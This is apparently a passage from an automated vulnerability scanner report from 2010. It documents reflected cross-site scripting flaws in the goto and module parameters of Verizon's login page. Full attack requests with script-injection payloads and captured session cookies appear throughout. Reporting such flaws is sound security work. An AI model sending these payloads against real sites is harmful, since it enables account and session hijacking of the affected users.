<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
6,Feature1,Spon3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=Iraq+War;Afghanistan+War;Baghdad;Kandahar;Kabul;Pakistan;Swat+Valley;U.S.+military;troops;Taliban;Al+Qaeda;Shiite;Sunni+and+Kurd&src=twr2fe07\"><script>alert(1)</script>ef0c8b9436d">
...[SNIP]...

2.189. https://auth.verizon.com/amserver/UI/Login [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8af9a"%3b4024f132588 was submitted in the goto parameter. This input was echoed as 8af9a";4024f132588 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /amserver/UI/Login?realm=dotcom&module=AIAW&clientId=myvz&goto=https%3A%2F%2Fwww22.verizon.com%3A443%2FForYourHome%2FMyAccount%2FProtected%2FServices%2FMyServices.aspx8af9a"%3b4024f132588 HTTP/1.1
Host: auth.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:15:21 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSCSBQTCB=EHCLJDFBFEEGFCIFCBIGJOAL; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:20:21 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 129007

<!-- Vignette V6 Fri Nov 19 18:15:20 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
   window.location.href="http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx8af9a";4024f132588";
}

function fnSetSessionCookie(name,value,path,domain){
   document.cookie=name+"="+escape(value)+((path)?";path="+path:"")+((domain)?";domain="+domain:"");
}
var strRemOpt="";
var strMyVzCom=f
...[SNIP]...

2.190. https://auth.verizon.com/amserver/UI/Login [module parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The value of the module request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed15f"><script>alert(1)</script>14aed921693 was submitted in the module parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /amserver/UI/Login?realm=dotcom&module=AIAWed15f"><script>alert(1)</script>14aed921693&clientId=myvzorl&goto= HTTP/1.1
Host: auth.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vzapps=STATE=TX; JSESSIONID=8D8835B40A91EF6F7C2190E960B846C4; Product=A; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0W